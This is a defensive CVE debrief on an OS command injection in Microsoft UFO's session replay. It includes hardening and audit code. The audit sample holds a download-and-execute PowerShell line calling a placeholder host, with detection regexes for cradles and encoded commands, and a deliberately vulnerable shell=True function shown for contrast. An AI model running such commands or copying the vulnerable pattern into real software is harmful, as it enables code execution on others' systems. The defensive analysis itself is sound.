PatchSiren cyber security CVE debrief
CVE-2026-45322 microsoft CVE debrief
CVE-2026-45322 is a high-severity OS command injection vulnerability (CWE-78, improper neutralization of special elements used in an OS command) in Microsoft UFO, the open-source framework for intelligent automation. It affects tagged releases up to and including v3.0.0 and lives in the shell action replay path.

The root cause is that ShellReceiver.run_shell() passes a command string taken from action parameters straight to subprocess.Popen() with shell=True and executable=powershell.exe. The same shell-execution behavior is reachable through ShellReceiver.execute_command(). Both receiver methods are called by action classes including RunShellCommand.execute() and ExecuteCommand.execute(), which forward stored action parameters without adequate sanitization. Because UFO persists planned and executed actions in per-session JSON records, those records effectively become executable input: an attacker with write or modify access to a session/action JSON file can insert a shell action of their own, and when the session is resumed or replayed UFO runs that command with the privileges of the UFO process user.

The CVSS 3.1 vector (AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H) describes a local attack with low complexity, requiring low privileges but no user interaction, with high impact to confidentiality, integrity and availability (base score 7.8). The vulnerability was published on 2026-05-27. Organizations using Microsoft UFO should upgrade to a fixed release newer than v3.0.0 once one is available, restrict write access to session/action JSON files, and validate action parameters before shell execution.
- Vendor: microsoft
- Product: UFO
- CVSS: HIGH 7.8
- CISA KEV: Not listed in stored evidence
- Original CVE published: 2026-05-27
- Original CVE updated: 2026-05-28
- Advisory published: 2026-05-27
- Advisory updated: 2026-05-28
Who should care
Organizations using Microsoft UFO for intelligent automation across Windows environments, particularly those enabling session recording and replay functionality. Security teams responsible for supply chain and open-source component risk management. Developers building automation workflows with UFO who may process untrusted session data.
Technical summary
The vulnerability stems from the ShellReceiver.run_shell() and ShellReceiver.execute_command() methods in Microsoft UFO v3.0.0 and earlier, which pass unsanitized command strings from action parameters to subprocess.Popen() with shell=True and executable=powershell.exe. The action classes RunShellCommand and ExecuteCommand forward stored parameters to these methods. Because the framework persists actions in per-session JSON records, those files are a trust boundary the code does not enforce: anything able to write a shell action into a session file gets arbitrary PowerShell execution as the UFO process user the next time the session is resumed or replayed. Note that the stored parameter is itself the command line, so filtering shell metacharacters out of it is not a reliable control; the effective defences are preventing untrusted modification of the records and constraining what a replayed shell action may run.
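The pattern described above, modelled in plain Python, next to one way of hardening the replay path. This is an added example, not code from the UFO project or from the advisory: the session JSON layout, the function names, the HMAC key handling and the allowlist are all assumptions chosen for illustration. The vulnerable function is shown only for contrast and is never invoked; the hardened path replaces the shell string with an argv list, checks argv[0] against an allowlist, runs with shell=False, and refuses to replay a record whose HMAC no longer matches.

```python
"""Added example, not UFO's code: the shell-replay pattern from the advisory,
modelled in plain Python, beside a hardened replay path.

Everything here is illustrative. The session JSON layout, function names,
HMAC key handling and allowlist are assumptions, not UFO's real schema.
"""
import hashlib
import hmac
import json
import subprocess
from typing import Callable, Optional

# --- Vulnerable shape (for contrast only; never called below) ------------
def run_shell_vulnerable(command: str) -> subprocess.Popen:
    """Mirror of the advisory's pattern: the stored action parameter is handed
    to a shell as one string, so whoever can write that string into the
    session file chooses what runs. UFO pins executable="powershell.exe";
    the default shell is used here to keep the snippet portable, which does
    not change the problem."""
    return subprocess.Popen(command, shell=True)

# --- Hardened replay ------------------------------------------------------
# Only these program names may appear as argv[0] of a replayed shell action.
ALLOWED_EXECUTABLES = frozenset({"hostname", "whoami", "ipconfig"})  # illustrative

def _canonical(actions: list) -> bytes:
    # Stable serialisation so the MAC does not depend on key order or whitespace.
    return json.dumps(actions, sort_keys=True, separators=(",", ":")).encode()

def sign_session(actions: list, key: bytes) -> dict:
    """Write path: attach an HMAC-SHA256 over the action list. The key must live
    outside the session directory (e.g. in the OS credential store); if the
    attacker can read it, they can simply re-sign their tampered record."""
    mac = hmac.new(key, _canonical(actions), hashlib.sha256).hexdigest()
    return {"actions": actions, "mac": mac}

def verify_session(record: dict, key: bytes) -> bool:
    """Replay path, step 1: reject any record whose MAC no longer matches."""
    expected = hmac.new(key, _canonical(record.get("actions", [])), hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, str(record.get("mac", "")))

def build_argv(action: dict) -> list:
    """Replay path, step 2: the action carries argv as a list (never a shell
    string) and argv[0] must be allowlisted. No shell ever parses it."""
    if action.get("type") not in {"RunShellCommand", "ExecuteCommand"}:
        raise ValueError(f"not a shell action: {action.get('type')!r}")
    argv = action.get("params", {}).get("argv")
    if not isinstance(argv, list) or not argv or not all(isinstance(a, str) for a in argv):
        raise ValueError("shell action must carry a non-empty argv list of strings")
    if argv[0] not in ALLOWED_EXECUTABLES:
        raise ValueError(f"executable not allowlisted: {argv[0]!r}")
    return argv

def replay_session(record: dict, key: bytes,
                   runner: Optional[Callable[[list], None]] = None) -> list:
    """Verify the record, then run each shell action with shell=False.
    `runner` lets callers dry-run instead of spawning processes."""
    if not verify_session(record, key):
        raise PermissionError("session record failed integrity check; refusing to replay")
    executed = []
    for action in record["actions"]:
        argv = build_argv(action)
        if runner is None:
            subprocess.run(argv, shell=False, check=False)
        else:
            runner(argv)
        executed.append(argv)
    return executed

def demo() -> dict:
    """Exercise the two failure modes the hardened path catches: (a) an action
    appended to the JSON after signing, (b) a signed action whose program is
    not allowlisted. Uses a dry-run runner, so nothing is executed."""
    key = b"demo-key-kept-outside-session-dir"  # illustrative
    good = sign_session([{"type": "RunShellCommand", "params": {"argv": ["whoami"]}}], key)
    ran = replay_session(good, key, runner=lambda argv: None)

    tampered = json.loads(json.dumps(good))  # deep copy, then inject an action
    tampered["actions"].append({"type": "RunShellCommand",
                                "params": {"argv": ["powershell.exe", "-EncodedCommand", "SQBFAFgA"]}})
    try:
        replay_session(tampered, key, runner=lambda argv: None)
        tamper_blocked = False
    except PermissionError:
        tamper_blocked = True

    bad_prog = sign_session([{"type": "ExecuteCommand",
                              "params": {"argv": ["powershell.exe", "-c", "whoami"]}}], key)
    try:
        replay_session(bad_prog, key, runner=lambda argv: None)
        allowlist_blocked = False
    except ValueError:
        allowlist_blocked = True
    return {"ran": ran, "tamper_blocked": tamper_blocked, "allowlist_blocked": allowlist_blocked}

if __name__ == "__main__":
    print(demo())
```

The integrity check only helps when the principal writing session files is not the same one that holds the signing key; if the attacker already runs as the UFO user, neither HMAC nor file permissions add anything, and the allowlist is what bounds the blast radius. The argv-list change is the part that removes the CWE-78 condition: with shell=False and no shell string, there are no metacharacters to neutralize.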
Defensive priority
HIGH
Recommended defensive actions
- Upgrade Microsoft UFO to a version newer than v3.0.0 when available
- Restrict file system permissions on UFO session/action JSON files to prevent unauthorized modification
- Validate action parameters before shell execution, preferring an allowlist of permitted executables with structured arguments over metacharacter filtering, since the stored parameter is the whole command line
- Monitor for powershell.exe launched as a child of the UFO (Python) process, especially with encoded, hidden-window or download-cradle command lines
- Review and audit existing session/action JSON files for injected commands before replay
- Consider disabling session replay functionality in production environments if not required
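A triage pass over stored session/action JSON before replay, as an added example supporting the audit step above; it is not part of the advisory or of the UFO project. The field names ("actions", "step", "type", "params.command") are an assumed layout and must be mapped to the real UFO log files before use; the action class names RunShellCommand and ExecuteCommand come from the advisory. SAMPLE_SESSION is constructed test data, and the heuristics are common PowerShell abuse indicators rather than anything specific to this CVE.

```python
"""Added example, not part of the advisory or UFO: flag shell actions in a
session record that deserve a human look before the session is replayed.

Assumed layout (not UFO's real schema): {"actions": [{"step", "type",
"params": {"command"}}]}. SAMPLE_SESSION is constructed test data.
"""
import json
import re
import sys

# Action class names named in the advisory as reaching the shell receiver.
SHELL_ACTION_TYPES = {"RunShellCommand", "ExecuteCommand"}

# Indicators that should not appear in a benign replay. A hit means "stop and
# read this action"; no hit is not a clean bill, so every shell action is
# still reported for review.
SUSPICIOUS = [
    ("download cradle", re.compile(
        r"Invoke-WebRequest|\biwr\b|DownloadString|DownloadFile|Net\.WebClient"
        r"|Start-BitsTransfer|\b(?:curl|wget)\b", re.I)),
    ("dynamic evaluation", re.compile(r"\bIEX\b|Invoke-Expression", re.I)),
    ("encoded command", re.compile(
        r"(?<=\s)-e(?:nc(?:odedcommand)?|c)?\b|FromBase64String", re.I)),
    ("hidden window or policy bypass", re.compile(
        r"-w(?:indowstyle)?\s+hidden|-nop\b|-noprofile\b|ExecutionPolicy\s+Bypass", re.I)),
    ("command chaining or pipeline", re.compile(r"[;|&]")),
]

# Constructed sample: one UI action, one plausible admin command, and two
# injected actions. "SQBFAFgA" is base64 of UTF-16LE "IEX".
SAMPLE_SESSION = {
    "session_id": "demo-0001",
    "actions": [
        {"step": 1, "type": "ClickInput", "params": {"control": "OK"}},
        {"step": 2, "type": "RunShellCommand", "params": {"command": "ipconfig /all"}},
        {"step": 3, "type": "ExecuteCommand",
         "params": {"command": "powershell -nop -w hidden -EncodedCommand SQBFAFgA"}},
        {"step": 4, "type": "RunShellCommand",
         "params": {"command": "whoami; IEX (New-Object Net.WebClient)"
                               ".DownloadString('http://example.invalid/p.ps1')"}},
    ],
}

def audit_actions(actions: list) -> list:
    """Return one finding per shell action: verdict 'block' if any indicator
    matched, otherwise 'review' (a shell action still runs on replay)."""
    findings = []
    for action in actions:
        if action.get("type") not in SHELL_ACTION_TYPES:
            continue
        command = str(action.get("params", {}).get("command", ""))
        reasons = [name for name, rx in SUSPICIOUS if rx.search(command)]
        findings.append({
            "step": action.get("step"),
            "type": action["type"],
            "command": command,
            "reasons": reasons,
            "verdict": "block" if reasons else "review",
        })
    return findings

def audit_session_file(path: str) -> list:
    """Load a session record from disk (assumed layout) and audit it."""
    with open(path, encoding="utf-8") as fh:
        record = json.load(fh)
    return audit_actions(record.get("actions", []))

if __name__ == "__main__":
    findings = (audit_session_file(sys.argv[1]) if len(sys.argv) > 1
                else audit_actions(SAMPLE_SESSION["actions"]))
    for f in findings:
        print(f"step {f['step']:>3} {f['type']:<16} {f['verdict']:<6} "
              f"{', '.join(f['reasons']) or '-'}")
        print(f"    {f['command']}")
```

Run it with a path to a session file to audit that file, or with no arguments to see the constructed sample. Treat a "review" verdict as a prompt to confirm the command was planned by the session owner, not as approval; the point of the step is that nothing in a session file should be replayed sight unseen.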
Evidence notes
Vulnerability description sourced from official CVE record and NVD entry. Technical details confirmed via GitHub Security Advisory GHSA-wj72-7w8h-695f. CWE-78 classification and CVSS 3.1 scoring from NVD source data. Affected versions explicitly stated as up to and including v3.0.0.
Official resources
- CVE-2026-45322 CVE record (CVE.org)
- CVE-2026-45322 NVD detail (NVD)
- Source item: nvd_modified
- Source reference: 2026-05-27